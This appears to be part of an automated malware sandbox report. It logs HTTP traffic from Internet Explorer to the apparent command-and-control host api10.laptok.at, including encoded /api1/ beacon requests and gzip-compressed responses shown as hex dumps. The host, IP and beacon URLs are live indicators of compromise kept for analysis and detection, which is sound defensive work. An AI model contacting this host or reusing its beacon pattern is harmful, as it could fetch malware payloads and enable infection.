QjR~=Vac2GKQ'BK5d@eQ?~Km"Qu\|EscL$9{xi+t[xm5Md\|\|D.T5:XR[z,MMqZ-\P@Ht\|&)@D9}tAPq7!./jW?= -i(~DM>>wd<)32q@i`f/8cK}W)B`t^{V8cH%FMo_"1QDG@4dZ1[Ays/"H^gt#{>a l~Gx :HaZu6WIrD:z3P'cSf'ap`&6p;dRD9WeMhaR\/ >Cif/p.1#zZiNJEz?N?]66#\\|ft:@w8%_~ KbfnukO(Lb,qnIm{aB]q{ Kh ;x7q51F48ffw#IH,R-"=f4{@u-kc`.;qPF5YND%{etC9B\|`P+.7bMz"}=F<NfG~+\|50
Feb 15, 2021 21:26:43.847158909 CET	3075	IN	Data Raw: b6 ac 32 f6 51 2d a2 c7 55 40 e0 f8 88 1a fa 56 15 a3 44 c1 e9 ef 66 7e 8e 96 67 ce 3e d7 c6 5d 4b e6 32 e3 7d e6 8e de ec a1 77 a7 e6 ac 5f 8d f9 25 4b fc 72 8b dc 1e a5 ce b5 f4 f9 46 2e 1f 63 a3 b9 38 95 01 a3 45 c4 68 68 b5 5b 97 9e bb 97 7d Data Ascii: 2Q-U@VDf~g>]K2}w_%KrF.c8Ehh[}JkI\|}3+{PEjB0UD 3CC<GEalx>_-~?rN[Y;y-2 w$~!o(,R#!p=E
Feb 15, 2021 21:26:43.847184896 CET	3077	IN	Data Raw: 97 26 b5 9d e9 9d ab 60 df d9 aa 65 43 a4 29 d4 36 71 69 ca 81 22 4f ef 1f 37 79 81 59 ac 35 d9 44 1c 97 57 8f f1 a7 41 ce 13 ab 7c bf ec dd cf a4 8b bb b7 a9 b4 4c 28 d6 c3 25 5f 5d 80 be df a5 40 59 18 c7 c9 48 4c e2 14 99 91 2a f8 de b3 e8 cd Data Ascii: &`eC)6qi"O7yY5DWA\|L(%_]@YHLpxxk];=g@{6QfLxvJfaL=#&qy-VCxg\|).tK*i`mZlR\=V
Feb 15, 2021 21:26:43.847208023 CET	3078	IN	Data Raw: 4a 16 c1 b7 ac 28 27 3c 6f c4 57 03 23 86 04 a6 11 d0 bc 24 27 3a 56 05 44 df 0a 8c c7 05 37 dd 97 36 2b 3a 5c 9c 03 84 21 28 ae 86 c0 b2 62 3d c3 ab 24 36 e2 c0 e8 6c 79 d6 77 ea c3 ef 42 90 e9 a7 25 6f b4 06 72 84 74 c0 f7 bc 62 ec dd f2 58 b1 Data Ascii: J('<oW#$':VD76+:\!(b=$6lywB%ortbXyH&is<Br*%^C4cKR<b_+l40H(Gr\ZJ`vIgN:k_<:d!&Q)&>[!J_Pbnxu
Feb 15, 2021 21:26:43.847234011 CET	3079	IN	Data Raw: 25 e2 d8 29 be d5 c4 4b 52 0c a9 3f c1 7e d0 b0 3d 90 b0 9f 53 17 95 db cb 64 57 0f 0c 83 93 6d 06 6c 8b e7 a0 b0 58 09 bb cf 0e bb e4 62 36 a5 aa 80 bc 00 01 8b db 97 6f d0 a1 6f c7 c5 74 20 f2 8f 85 21 fb b7 64 c5 25 7c 18 af c7 c8 5a b3 1e 81 Data Ascii: %)KR?~=SdWmlXb6oot !d%\|ZE<<UetOx;\#V'09.c^=#hynUGM_by$}Fy{4?fFC.\\|^gJ^fM^?u-+#K`%JtfBP+Od71
Feb 15, 2021 21:26:43.847282887 CET	3081	IN	Data Raw: 29 c5 2d 2a 00 64 d5 07 1c c8 c2 0d 5a 36 1d 93 45 de ec 7e 81 b1 ad e0 29 3f 2d 54 14 bb 6e 06 dd 1f 5b 19 21 bb 3b 2b f8 46 ed 72 22 d9 8d c8 00 ba e6 20 0b 84 89 0b 0c 00 0d 4f 78 9f c3 06 28 6c 1e 2d f5 0f f4 d5 a2 73 ca 11 fd 5c 16 ab 50 ce Data Ascii: )-*dZ6E~)?-Tn[!;+Fr" Ox(l-s\PFxsWH\|[X}l-suEdx#qcAvghaAvy@AkMl-S:inP$dySs w1="z)[nd3{2';
Feb 15, 2021 21:26:43.887193918 CET	3082	IN	Data Raw: f0 08 09 ea 03 0b 4b 21 56 52 55 ed 1d cc da d0 54 eb 16 ba 84 3b d8 12 00 4d 73 e7 c1 7e 05 10 0e 5a e3 a2 a3 9a 60 3b 4a 28 a6 eb 4a 5b 12 79 4c 68 8a 31 1c 51 eb 71 76 9c ae 73 5e 02 92 ad 57 7c 9d 91 71 e0 26 e6 58 5a 40 ef b9 e4 33 b4 38 0c Data Ascii: K!VRUT;Ms~Z`;J(J[yLh1Qqvs^W\|q&XZ@38u<{slMlW K^"@53-Vto1!mra5eXs48K=wEWvAuPuwrkPBHQ.o4e a
Feb 15, 2021 21:26:43.887233019 CET	3084	IN	Data Raw: 60 66 b3 ea aa 58 8b a5 de 43 c8 b4 1e 56 a0 da b6 b1 34 08 cb e5 3b c7 b5 89 aa 71 bd 4a d8 7b 8f 09 58 21 64 64 4a 25 96 18 fa f4 06 56 7c 6f 3e 72 22 9a b4 93 e4 2b 29 e0 46 52 87 cd 7c 2c af f0 76 ec 2b a2 3d 6c a9 17 1d 8a 31 b9 63 a4 d2 18 Data Ascii: `fXCV4;qJ{X!ddJ%V\|o>r"+)FR\|,v+=l1c)bE'.y<?`;WL$>!gEugl 5n.zfDPdX6Z%y'c~ZJ%W\|npN~7/WaO ND:E3fj6EIO
Feb 15, 2021 21:26:43.887258053 CET	3085	IN	Data Raw: a2 d3 70 e1 b1 e6 71 58 f9 63 a1 be 0f d8 d1 0d f5 59 9f 31 7a c1 ab 9e 89 a3 dc d3 b4 5c a7 41 36 10 f2 7c f8 33 2e 64 cc 7b 57 72 d6 54 6e 1a 8c ce e8 9b 13 3a 5f 1b 62 e7 f8 11 80 3e d8 dd 50 79 a4 fe b1 c7 29 c6 8a 99 e1 7f 5d 82 d5 ed 5e d1 Data Ascii: pqXcY1z\A6\|3.d{WrTn:_b>Py)]^'7R/Q\|?>7e9bg_gtw"A}=9fcdP8oFXD0!7=Dnt]F3*SZ}L/3tCxn,Z@o=Y~~`/l
Feb 15, 2021 21:26:43.887279987 CET	3086	IN	Data Raw: 5c fa 90 b8 57 0c 74 e8 b7 35 f1 09 fc 0f f0 a4 10 25 d2 ea 65 c8 61 a8 f4 4a 8c 2e 72 f2 23 8e 7c 03 40 fa f6 29 90 eb db b5 22 a1 72 7a 9e ad a0 99 07 f0 34 ec 56 61 01 ee ba 06 32 dc 13 80 4c 46 02 60 d8 7f 8b 95 4a 75 3e 1c 50 e1 d5 45 03 75 Data Ascii: \Wt5%eaJ.r#\|@)"rz4Va2LF`Ju>PEu2 Cg.mF5!L&]7~Y:$L;DCfmwnlv QA}IhG^0!zWKA8^c
Feb 15, 2021 21:26:43.892352104 CET	3088	IN	Data Raw: 3a 78 28 96 e7 e9 c1 38 28 ee ef 24 12 eb eb 74 e1 c7 ea a9 ad 5d 6a 19 d3 60 3c e1 ba a9 57 5a a4 7b 14 8b 48 50 ff fd b7 7b f6 fd bd b4 c1 1f c8 f6 70 e0 c9 9d 04 16 c1 2c a3 7d d9 f4 5b 66 d3 99 f2 cb 84 b9 f7 d7 05 31 eb fb d5 6c 62 f5 2b 42 Data Ascii: :x(8($t]j`<WZ{HP{p,}[f1lb+B.4Vbth~v}!. @1{ketvRXcs`1(80O)VG'rn*p>4?& PA)"'9]SKQq+9$9R03`k:F+e>kUsE

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49756	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 15, 2021 21:26:44.306616068 CET	3287	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 15, 2021 21:26:44.431600094 CET	3287	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 15 Feb 2021 20:26:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49760	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 15, 2021 21:26:46.909322977 CET	3346	OUT	GET /api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 15, 2021 21:26:47.384097099 CET	3374	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 20:26:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 7a 83 50 10 46 1f 28 0b dc 96 b8 4b 70 d8 21 c1 dd e1 e9 4b bb ec 97 92 70 ef cc 3f e7 90 5b bc 31 37 2b 68 26 65 55 4b 91 92 ab 92 ab e1 70 70 58 e5 e7 58 97 69 84 d0 e0 93 41 f4 11 d9 40 08 ee b9 6c 9a 02 4f 18 29 46 c5 1e a1 02 11 c1 8c 8e 6e 3a 47 d0 cf 75 10 ad 31 a4 03 6d d4 01 5f b3 87 30 b7 92 73 d8 f0 49 a6 93 bb 09 40 18 89 cb 85 e6 82 86 12 9a 05 a8 f8 f5 cb 7a 3f 34 32 08 3b 7b f4 4a 28 04 c6 51 78 e0 f7 4b a4 29 9d be e6 8d 84 a1 a2 b1 3c ab eb 88 92 9c fe ad ca 58 cd 29 b2 90 6f a4 66 83 39 58 b9 10 b5 96 04 22 8f 23 60 36 31 b8 ee b9 85 d5 f5 65 ae 8e c7 5a 9f 8f ec 16 3a c6 85 9f df 19 86 86 53 f6 48 f2 c4 1d c4 cf 5a 30 71 54 14 07 3d 64 95 8a 36 6f 75 43 20 1f e0 c7 6e d2 37 ef bd 8f 20 cc 1e f7 45 c2 61 6a 57 22 68 0a b5 ce 46 15 39 aa 2b 7a 8a fd 94 78 84 f6 58 dd 2f 9f 53 e0 9f 76 68 d8 1f b5 cb 69 67 69 d7 7c 05 ba 87 2b 1a 37 fd 1c 37 cd ee 2b 55 cb b2 5d a6 8f 49 52 31 2f 7c 52 27 9b b0 81 52 32 a8 58 e5 56 a7 8c ec 84 b0 ef 06 46 ee e5 03 7a e9 c3 70 c8 5d 2c 54 b9 41 a8 7f 77 43 3a bd e7 37 bb 85 70 54 30 fe 61 8c 4b 07 ac d3 c0 6e 53 a9 7e 4f 62 c4 d3 77 22 66 6a e3 1c 63 6d 73 ce 2d b6 7b 46 55 72 2c d4 92 8d 0f 08 7b fa 4f 87 ed 04 a0 67 39 36 5c a7 67 05 58 b0 86 09 51 a7 d4 d7 9a ba 4a 00 71 24 39 1a 3b a1 85 c0 9f 92 de 62 da af 05 19 90 33 ca a9 61 08 6b f9 48 9d 44 50 a5 95 30 e7 8e 84 50 ce d3 3f 24 ed ec bd d7 c4 68 21 4d 7a e5 cf 23 35 fd 4b 39 b4 0a 9f 09 0c 61 f4 23 6e 42 31 77 db 0f 95 0b f7 9e 72 09 d4 4c 1a b7 71 10 81 1f 46 f2 f9 b8 67 b9 2f 32 92 b3 72 7a 9e 62 7b b9 1f 87 60 b6 96 7d 60 6f f5 3b 12 18 af e3 33 dd fe ec ee 42 a0 18 8c bf 36 bd ce b8 d2 67 c4 eb eb b9 af 08 6d d9 f1 0b a1 0a 12 e0 7a 40 7e 9d 6c 1b 68 07 f6 1c cc eb 1e 26 67 6b 9e 90 be c6 30 12 20 8c ff 48 01 c6 ed 69 ad e9 3e 6b 36 fe 37 7f 11 b2 a1 07 37 e5 0a b3 07 f6 cf ca 44 5c 6a fe e8 73 62 1a 4d 04 b8 e5 fe e9 c8 b7 a6 4e c2 c4 b5 bd 11 b1 3a 61 ad c5 f7 ae 52 aa 02 0c c0 47 dd 26 d7 7c d3 dc c8 39 11 de 3e 14 2b 8f 67 60 da 3e 93 39 3b fe e0 72 45 7d 19 c7 f6 ae 4b 54 d5 bc 7a ee ce 2d 16 d8 f0 95 6e 7b d9 43 c8 3d ee 8f 21 8b 16 f0 b1 dc e9 21 97 6c b6 91 c9 f2 22 8e e3 62 9a 78 4a d4 85 64 20 82 8f 3d 86 b2 c5 a1 63 5a b9 f1 24 3c 15 0e 0c 1d fa e0 9f f0 44 4c 46 2a 06 99 d9 20 94 73 a7 69 de d5 7d f6 95 64 78 18 70 f9 1d 17 62 90 12 29 7a 9e 3c 64 df ba 43 13 a3 45 75 4b 6c 31 0b 9d 15 b3 b6 da af eb 2f 9f 24 96 7a 29 c2 c3 59 2b 5a f8 94 eb a5 ae a2 79 ef f2 0f 3d b2 41 a1 9e a6 64 41 14 51 c6 3b db a6 f7 28 21 67 6d 0a 1e ae ef f7 f0 cb 21 2a eb 88 6d ea 96 b9 6b 1c 33 e3 ad e8 5e 10 85 50 33 e2 b7 37 bf 25 1f b2 2e 16 fa 4b 05 6f b7 25 01 e7 bb 5d 47 a7 08 1b ea f4 2a 21 91 00 56 3f 19 17 7f e4 1b 32 16 64 ce 8c e5 a3 80 4e 42 95 ec 41 17 c1 79 41 78 39 5f b8 00 e5 f1 85 25 c4 00 22 05 28 48 86 e4 3b 36 7d a9 ee fd c3 b2 2a 59 81 f0 58 0e 2b d4 b1 2c 39 b1 b8 14 1b e1 0b e5 93 19 90 f2 86 ed 75 aa c7 96 ef 32 d5 a9 07 71 07 83 ed 7e 84 7b b5 0a 43 15 e0 41 3d 30 5c 93 92 78 35 ed 01 59 d1 6a e9 9d 3a 23 f2 df 07 aa a1 21 41 eb 00 72 e7 d9 83 61 45 1d a2 35 0f 35 d1 e6 bc Data Ascii: 2000zPF(Kp!Kp?[17+h&eUKppXXiA@lO)Fn:Gu1m_0sI@z?42;{J(QxK)<X)of9X"#`61eZ:SHZ0qT=d6ouC n7 EajW"hF9+zxX/Svhigi\|+77+U]IR1/\|R'R2XVFzp],TAwC:7pT0aKnS~Obw"fjcms-{FUr,{Og96\gXQJq$9;b3akHDP0P?$h!Mz#5K9a#nB1wrLqFg/2rzb{`}`o;3B6gmz@~lh&gk0 Hi>k677D\jsbMN:aRG&\|9>+g`>9;rE}KTz-n{C=!!l"bxJd =cZ$<DLF* si}dxpb)z<dCEuKl1/$z)Y+Zy=AdAQ;(!gm!mk3^P37%.Ko%]G!V?2dNBAyAx9_%"(H;6}*YX+,9u2q~{CA=0\x5Yj:#!AraE55
Feb 15, 2021 21:26:47.384141922 CET	3376	IN	Data Raw: 84 17 f4 df 16 1f db 93 1a 2d b0 ed 95 2f 43 dd 86 36 c3 8f 2c fd af a1 07 95 4a af 38 6a 58 d1 b7 5a 35 a5 6d aa 62 db bd 4f ad 33 f2 43 7e 76 32 bd a0 0a fa 9d c6 e0 e7 bf ab 43 50 df 9f 9c 3e 12 af 6e 32 5c 64 c7 39 d1 97 ad a7 3f e3 37 47 3a Data Ascii: -/C6,J8jXZ5mbO3C~v2CP>n2\d9?7G:OX!y=dot-E"NmZ1<NZ>k'O">z3@ \6H#}O!pn"\"DgxcH)>Dz$wCH.E
Feb 15, 2021 21:26:47.384166002 CET	3377	IN	Data Raw: 84 11 57 7c 42 21 64 da a4 47 59 85 ea 01 05 9c aa fd d8 5e 64 c8 d2 82 55 72 ff 81 22 52 ff f6 26 7a b1 f2 bd 53 e1 67 9d d3 62 27 e5 c4 da 4e ce e1 a7 74 68 93 e8 ee 0b 81 b8 f5 fc e1 f9 85 87 e9 4a 32 85 fd 4c b7 67 8f aa 49 08 9a f8 c1 b7 f9 Data Ascii: W\|B!dGY^dUr"R&zSgb'NthJ2LgItoNBt7aq9<2&2t_KorC5k+Q%5h9B(8^x!NM,E,g`==9zYf(48Sw\|MyHZV.@8Q%>$1.
Feb 15, 2021 21:26:47.384188890 CET	3379	IN	Data Raw: 13 07 1b 5a da d5 1a cb 03 a4 9c 80 81 2d f4 f2 86 28 84 16 59 6a a2 af c6 f4 30 6e 4c 5b c5 c8 ba 96 af d1 3b 3d 1a 23 c4 ba 0c 67 60 26 74 30 dc 76 0b 11 b5 05 7d 1e 19 70 1f b3 d0 e8 2b 6a 18 67 67 47 61 b3 b4 ae 6f 66 b3 46 84 c8 94 3f 66 b4 Data Ascii: Z-(Yj0nL[;=#g`&t0v}p+jggGaofF?fL$=OU.S>8cq#jdbGs$3Iwm;}kwB4I}#$MDG-CGqv]Mz7:@R2oR\|P]8=[_Nd~H7:@u=M2
Feb 15, 2021 21:26:47.384211063 CET	3380	IN	Data Raw: bb a6 bc eb ac 2e e5 16 e7 e1 5c 4b 85 ea d4 b2 55 74 93 b8 91 8a 06 65 5f 84 83 1b d4 73 00 36 83 dd cd 81 ce 5a 11 c5 96 35 a3 92 3b 90 81 3d 51 c6 7d ef 09 19 2b 1d 0c 02 d7 f9 09 9e ce 55 f5 b9 76 c5 7e 02 b8 9d 9b b4 f1 08 d5 ae 9f 63 d4 8a Data Ascii: .\KUte_s6Z5;=Q}+Uv~cXcL}W' xwU"'ITi?;IhRFJlf~Fh*bTKf3q~NR]D-8f!F&Q?yF4rUs^H7l2pUyW6S;q)=
Feb 15, 2021 21:26:47.384233952 CET	3381	IN	Data Raw: f8 8b f0 a4 64 22 aa c9 9e e4 63 4f 27 7e 15 78 21 ff e8 50 ef da 76 94 2b 6c 4c f6 e9 6f 74 4f d5 be e2 00 51 48 26 66 f1 7a 61 ab 48 31 47 0e 71 cb 9b 6b 89 f6 51 7e 9c c9 5d d1 af f7 2b 9a 94 ad c9 fb 64 80 d0 d2 b1 9c 28 84 c0 73 db f7 8b 35 Data Ascii: d"cO'~x!Pv+lLotOQH&fzaH1GqkQ~]+d(s5pK+A/@A:S :p27$ALXc^Cr=x,"vr;o`Qj49C )hP2)B1+3W%,&#lv,\!\|X$Ih
Feb 15, 2021 21:26:47.423949003 CET	3383	IN	Data Raw: 0c f5 e2 d6 0a 0c e6 f6 7b c8 bd 22 f8 37 dd 18 39 c8 7e 9e da 61 dc 6e 90 26 ec d1 ac 7e b6 4f 11 06 d1 fd 0c 61 7a ca fc 55 82 9f 9b 01 9c 0b 11 43 83 e5 76 a7 4d 5e fe 2b a0 3d 6c 7b c2 b7 91 03 c8 9a 2e b2 f9 43 16 59 4b 42 57 05 b1 0f 97 a9 Data Ascii: {"79~an&~OazUCvM^+=l{.CYKBW"_I^@O9BC Nw\|UU {09(LT9o2HJahtrq9f?K10XHq7$?G@6'YFcU70KnteJ:;^+%x?~R/?
Feb 15, 2021 21:26:47.423989058 CET	3384	IN	Data Raw: a2 10 8d 6f b8 90 37 35 13 8b 42 b7 70 cf 7f 1c 42 b3 e0 9f 26 28 c2 ac 42 3f 63 b2 50 ba 8b 5b 90 ea 34 5c a3 3c 1d f9 c8 2e ad 34 77 05 c5 06 22 5e 52 51 67 ab 4f 32 8e 6e 5a 6a 85 56 32 50 bf 1d 80 a4 08 6b e6 84 d7 ed 0c 2f ff 98 de b1 a1 e6 Data Ascii: o75BpB&(B?cP[4\<.4w"^RQgO2nZjV2Pk/RcQ(r!_~c[G#V'['6>d'\|fS:Mn}E\ne=&,"*\|tSQ]0xEI\~v8ems6W1fX<L}\|'<vhJj^N
Feb 15, 2021 21:26:47.424012899 CET	3386	IN	Data Raw: 4d a4 4b b0 5a b7 f3 7d b9 9d ab 2a 62 f4 05 e2 96 c5 f9 ff 4b b4 c3 a3 7a 93 d6 eb 0b a3 59 de b3 5b fb a7 5d 86 e0 c9 dc 38 8a 7c 17 f0 35 52 f6 90 77 89 5f 52 f0 e7 b7 8f 85 53 56 20 4c e2 aa 9e 3d fa 8a d4 35 1f 6f f6 68 b0 62 16 44 a7 4d 0e Data Ascii: MKZ}bKzY[]8\|5Rw_RSV L=5ohbDM\|Z?oc!xg!gSg;6E1-vK5M98=g{K8E{+m0rIP+/HksvFFT~A>"!\m=4JCgTz-
Feb 15, 2021 21:26:47.424037933 CET	3387	IN	Data Raw: 70 ee 5d 80 29 b7 a4 05 0a de 5f 87 52 d8 e4 5d 50 5f 3f 27 81 63 75 59 87 5a f8 6e 11 7a 17 1f 3c cc a2 d6 91 f4 56 aa 96 d3 7f a3 f8 fe e4 71 eb 8f 69 14 6e bf b7 72 a7 1c 00 b2 2d 29 f7 85 11 f7 34 d3 d2 e9 a1 4b a1 07 7b 5c 4f ea 2f e6 82 e3 Data Ascii: p])_R]P_?'cuYZnz<Vqinr-)4K{\O/y.""07>#}-X34Nsj$~i`X~0tE1Cu "Tu'.\ImTHG%qB8)
Feb 15, 2021 21:26:47.433705091 CET	3388	IN	Data Raw: 83 0a 12 5f ce d1 d8 c9 1e 45 85 3d 05 01 31 d0 2d f0 1f 5f 56 96 e5 68 f0 47 85 07 9c 96 ee 3b 02 9e 82 6e 72 e3 b9 09 9a bc 6e a9 a9 33 96 c1 2d ab bf ac c9 c0 3a f7 0d c3 fe 27 e5 cb 55 d7 03 1b be e6 97 32 aa 63 57 9d 01 a7 a6 c8 90 aa 82 18 Data Ascii: _E=1-_VhG;nrn3-:'U2cWHp3xi4@Y k7`hgY"&K^q07/`~s3q36r6__{=(h2}#ybxT0rG4n;"<u`;c_:F}Cr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49761	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 15, 2021 21:26:47.958450079 CET	3641	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 15, 2021 21:26:48.081315994 CET	3641	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 15 Feb 2021 20:26:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49763	34.65.144.159	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 15, 2021 21:26:50.211947918 CET	3662	OUT	GET /api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 15, 2021 21:26:50.666774988 CET	3666	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 15 Feb 2021 20:26:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 37 36 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 94 35 b2 ad 00 00 43 17 44 81 5b f1 0b e0 e2 ee d2 e1 ee ce ea ff eb 33 93 49 ce 24 af 04 77 c5 49 30 a8 12 a5 a8 b6 a2 5f 8b 54 b2 76 d5 66 ff 0d 57 1e 19 f4 a9 6d 4f b3 8e 5d 45 3e 09 2d 0c e2 b5 e8 b3 78 a7 0e 77 9b 12 07 06 8a 34 67 0b 51 e1 e3 63 ff d2 ba 88 2a d0 67 de 7e 35 cb 0f 69 99 96 72 61 db 7b 64 dc e9 f2 d6 a6 75 f4 53 a0 da 04 4e 16 a0 fc 4e ed c7 26 8a 5a ea 13 9a 6e ed 08 0b 7c cc 3a 04 f3 0e 55 97 6e e6 ab 00 c3 c8 6a 3e 3d 02 cc c5 94 d7 1a 93 3d c4 4d 8c 9d e5 36 2c 6b 04 b0 a2 35 67 c4 32 d5 e1 dd e7 70 62 be a2 0e 18 bc 38 ba ab b1 7a 36 52 97 d5 24 07 50 19 12 89 13 47 0d 36 af 5b bb fa cd cb b8 0a f6 31 6f c5 40 c9 03 8d 2d 41 90 b6 41 4f ad da 6b 65 9e 25 e9 71 cd af da a4 99 20 88 95 3c 3c 66 1c 12 d8 9f 8e cd 93 47 d0 b6 47 a6 5b 04 6f 4d d2 8b 2f cf c7 e4 84 5d 76 cd cc af 49 1e d7 6c b8 90 2b 8d 5d a1 d9 c6 fa dd 05 61 75 4a 98 d3 fd 73 72 8d 75 74 4f fa 17 62 27 63 f7 72 0f 18 74 fd 12 89 50 ca 7f 95 5e cd b5 30 ed 73 02 4d ec 8d 0e fd 6a 8f 0f da 19 f4 c1 29 eb 63 52 47 f1 ce 75 99 1f a8 ab b7 5d e0 01 7b 63 e8 a3 2a 8a 29 e0 2c ab fb a8 d5 b7 a0 1b 15 fd a7 ad 41 18 48 22 e2 d4 38 f9 9c 35 fc 68 a4 a6 73 e4 17 a6 16 e5 90 0a 7c e9 12 c4 d4 42 af 20 53 e5 0d 82 c1 75 23 a0 da 29 78 00 6c 96 a6 b6 f0 b2 79 50 06 8b 8d 2e 02 32 5d 59 db de 2a 32 51 3b 0f f5 98 d5 90 e7 2c 7f 06 f2 ea 77 56 4b 3d 0a a4 93 d9 56 ad c5 34 a9 de 9d 38 55 c9 0a 16 a6 fe 75 f3 6e 90 f4 ec 0d 36 62 44 46 cb c3 58 ac 57 f0 99 73 4d da be 94 43 fe b3 08 9c 2e e9 a7 a1 d7 81 0c 6a ef e0 04 38 67 b6 ca 8b 92 ac e9 da 9e da 9b 01 31 84 4c e0 20 e9 ea c0 df 5e a6 72 73 1b a0 2f 9d 2e cc ce 52 45 79 86 4d b4 30 84 ce c2 4a ee a4 ba b5 15 ce f4 61 a3 d3 79 43 24 bf 0f 43 7c ff c0 cc 2b 95 da dc cb 22 a5 92 42 4d 22 3a 81 36 29 0b 65 c7 aa 04 c9 2a 2b b0 64 0f 11 06 cc ba 7e be df 28 6e 54 a5 32 6c 65 68 e7 f9 07 6e 08 80 ea 46 14 a1 19 01 c9 3c 88 40 2b b0 05 d6 aa 94 1b 6a a7 ab ce e4 84 d8 5c be ce df 6d 1c 47 d8 88 00 c1 81 61 93 7c dc 1d c0 25 b1 8a 12 5c 2b af c4 07 a2 d2 d9 6f 70 2d ff 42 85 e4 9f 43 10 83 a9 d9 91 44 72 12 00 65 f4 0f f9 5b c1 46 b7 42 8c 2c 85 17 d5 a5 c2 60 d0 68 fa 83 d4 c6 c5 a4 05 25 0a aa c0 bc 66 ae 9b d3 f8 8b 2e c1 d9 f3 88 fe cb 5e 25 25 e6 3b 24 51 9d e8 57 11 cc 97 43 ed 62 f3 e7 14 a5 ed 3a 78 b9 0b 64 e9 9a 69 a9 ac 80 4c fb d4 7a 6c 4d bf a6 fe a8 be 6d 94 af 0e 84 13 96 c0 1f 95 3f 35 51 33 8d bf 4e 40 d7 d6 a8 5a d1 a6 ab 93 ac af 5d ed 9c 3b 0a f3 1b 